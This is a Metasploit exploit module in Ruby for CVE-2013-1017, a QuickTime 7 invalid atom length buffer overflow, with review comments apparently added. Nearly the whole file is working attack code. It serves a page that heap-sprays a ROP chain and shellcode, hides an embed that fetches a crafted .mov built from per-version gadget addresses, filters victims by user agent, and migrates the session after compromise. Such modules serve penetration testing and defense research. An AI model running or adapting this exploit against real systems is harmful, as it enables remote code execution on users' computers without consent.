GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for CVE-2013-1017 (Apple QuickTime 7, invalid atom
# length in the rdrf/dref 'alis' record). It serves an HTML page that heap
# sprays a ROP chain with js_property_spray and then has an <embed> fetch a
# crafted .mov from this module's resource path. Gadget addresses are
# per-version offsets in QuickTime.qts for 7.7.0-7.7.3 with IE 8 on Windows
# XP SP3; the vendor fix is the Apple advisory referenced below (HT5770).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  # Module metadata: name, description, credits, references, per-version
  # gadget addresses, payload bad characters and default post-exploitation
  # options.
  #
  # @param info [Hash] additional module info merged through update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
      'Description' => %q{
        This module exploits a vulnerability found in Apple Quicktime. The flaw is
        triggered when Quicktime fails to properly handle the data length for certain
        atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
        overflow by loading a specially crafted .mov file, and allows arbitrary
        code execution under the context of the current user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
          'Tom Gallagher', # Original Discovery (overlapped)
          'Paul Bates', # Original Discovery (overlapped)
          'sinn3r' # Metasploit
        ],
      'References' =>
        [
          [ 'CVE', '2013-1017' ],
          [ 'OSVDB', '93625' ],
          [ 'BID', '60097' ],
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],
          [ 'ZDI', '13-110' ]
        ],
      'Platform' => 'win',
      'Targets' =>
        [
          # All of the following addresses are from Quicktime.qts
          # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
          # 'Ret' is read via target.ret, 'Nop' and 'Pop' via target[...] in #exploit.
          [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],
          [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],
          [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],
          [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]
        ],
      'Payload' =>
        {
          'BadChars' => "\x00" # js_property_spray no like nilz
        },
      'DefaultOptions' =>
        {
          # Migrates the session out of the browser process right after it opens.
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Privileged' => false,
      'DisclosureDate' => '2013-05-22'
    ))
  end

  # Builds the payload that the landing page sprays: a six-byte stack
  # adjustment stub ("add esp, -3500") followed by the encoded payload, both
  # wrapped by RopDb's 'msvcrt' ROP chain for the 'xp' profile.
  #
  # @param t [Msf::Module::Target] selected target; not read here, the
  #   gadgets come from the RopDb entry rather than the target hash
  # @return [String] ROP chain followed by the adjusted shellcode
  def get_payload(t)
    alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
    p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
    return p
  end


  # Decides whether a request gets the exploit content. True for an IE 8 on
  # Windows XP (NT 5.1) user agent and for QuickTime's own media fetch, which
  # identifies itself with "contype". Everything else is refused with a 404 by
  # #on_request_uri. A missing User-Agent header arrives as nil, which matches
  # neither pattern and therefore falls through to false.
  #
  # @param agent [String, nil] the request's User-Agent header
  # @return [Boolean]
  def targetable?(agent)
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
      return true
    elsif agent =~ /contype/
      # contype: a mov file request from Apple Quicktime
      return true
    end

    false
  end


  # Renders the landing page. The ROP payload is JS-unescape-encoded using the
  # target's endianness, passed to js_property_spray's sprayHeap, and a hidden
  # <embed> then requests a randomly named .mov under this module's resource
  # path, which #on_request_uri answers with @exploit.
  #
  # @param t [Msf::Module::Target] selected target; t.arch picks the endianness
  # @return [String] the HTML with the heredoc's four-space indent stripped
  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    fake_mov_name = rand_text_alpha(4) + ".mov"
    html = %Q|
    <html>
    <head>
    <script>
    #{js_property_spray}

    var s = unescape("#{js_p}");
    sprayHeap({shellcode:s});
    </script>
    </head>
    <body>
    <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
    </body>
    </html>
    |

    # The heredoc above is written with a four-space indent; strip it so the
    # served page does not carry the source formatting.
    html.gsub(/^ {4}/, '')
  end


  # HTTP request handler. Unsupported user agents receive a 404; a URI ending
  # in .mov receives the crafted movie assembled by #exploit (@exploit), and
  # any other URI receives the spray/embed page from #get_html.
  #
  # @param cli the client connection passed by the HTTP server mixin
  # @param request the parsed HTTP request (headers and uri are read)
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")

    unless targetable?(agent)
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected as: #{target.name}") if target

    # NOTE(review): `$` matches before a trailing newline as well as at the
    # end of the string; `\z` would anchor the whole URI.
    if request.uri =~ /\.mov$/
      print_status("Sending specially crafted .mov file")
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })
    else
      html = get_html(target)
      send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
    end
  end

  # Packs each 32-bit value big-endian and then swaps its two 16-bit halves,
  # so 0xAABBCCDD becomes "\xCC\xDD\xAA\xBB"; the results are concatenated.
  # NOTE(review): `/../` does not match "\n", so a value containing byte 0x0a
  # would lose bytes here. None of the configured 'Ret' addresses contain one.
  #
  # @param data [Array<Integer>] 32-bit values
  # @return [String] packed bytes
  def sort_bytes(data)
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
  end

  # One little-endian dword holding the target's 'Nop' gadget (a RET in
  # QuickTime.qts); #exploit repeats it to form a slide before the pivot.
  #
  # @param t [Msf::Module::Target] selected target
  # @return [String] four packed bytes
  def rop_nop(t)
    [t['Nop']].pack('V*') # Ret (QuickTime.qts)
  end

  # Assembles the crafted .mov into @exploit, then calls super to start the
  # HTTP server that serves it. `buf` is the overflow data appended to the
  # movie: filler up to the pivot, a RET slide, POP ESP; RET with 0x20302020
  # (where the sprayed ROP chain is expected), filler to offset 611 (the SE
  # Handler slot), the ADD ESP,280 pivot, and filler to 658 bytes. The atom
  # tree is moov > rmra > rmda > rdrf with data reference type 'alis'; the
  # rdrf size field is zero and a later length field is the non-numeric "AA",
  # which is the malformed-length condition the module description refers to
  # and the structural feature a content filter for this CVE can key on.
  def exploit
    # NOTE(review): '' is mutated with << below; if a frozen_string_literal
    # magic comment is ever added to this file this needs String.new or +''.
    buf = ''
    buf << rand_text_alpha(467) # 467 to align the pivot
    10.times {
      buf << rop_nop(target)
    }
    buf << [
      target['Pop'], # POP ESP; RET (QuickTime.qts)
      0x20302020 # Target value for ESP (our ROP payload)
    ].pack('V*')
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
    buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size

    # Quicktime File Format Specifications:
    # https://developer.apple.com/standards/qtff-2001.pdf
    # Atom layout: 4-byte big-endian size followed by a 4-byte type tag.
    mov = "\x00\x00\x06\xDF" # File size
    mov << "moov" # Movie atom
    mov << "\x00\x00\x06\xD7" # size (1751d)
    mov << "rmra" # Reference Movie atom
    mov << "\x00\x00\x06\xCF" # size (1743d)
    mov << "rmda" # rmda atom
    mov << "\x00\x00\x06\xBF" # size (1727d)
    mov << "rdrf" # Data reference atom
    mov << "\x00\x00\x00\x00" # size set to 0
    mov << "alis" # Data reference type: FS alias record
    mov << "\x00\x00\x06\xAA" # Size (1706d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00\x06\x61" # Size (1633d)
    mov << rand_text_alpha(38)
    mov << "\x12"
    mov << rand_text_alpha(81)
    mov << "\xFF\xFF"
    mov << rand_text_alpha(18)
    mov << "\x00\x08" # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x08" # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x26" # Size (38d)
    mov << rand_text_alpha(38)
    mov << "\x00\x0F\x00\x0E"
    mov << "AA" # Size (must be invalid)
    mov << rand_text_alpha(12)
    mov << "\x00\x12\x00\x21"
    mov << rand_text_alpha(36)
    mov << "\x00"
    mov << "\x0F\x33"
    mov << rand_text_alpha(17)
    mov << "\x02\xF4" # Size (756h)
    mov << rand_text_alpha(756)
    mov << "\xFF\xFF\x00\x00\x00"
    mov << buf # overflow data goes last, after the alias record fields

    @exploit = mov # read by #on_request_uri for .mov requests
    super
  end
end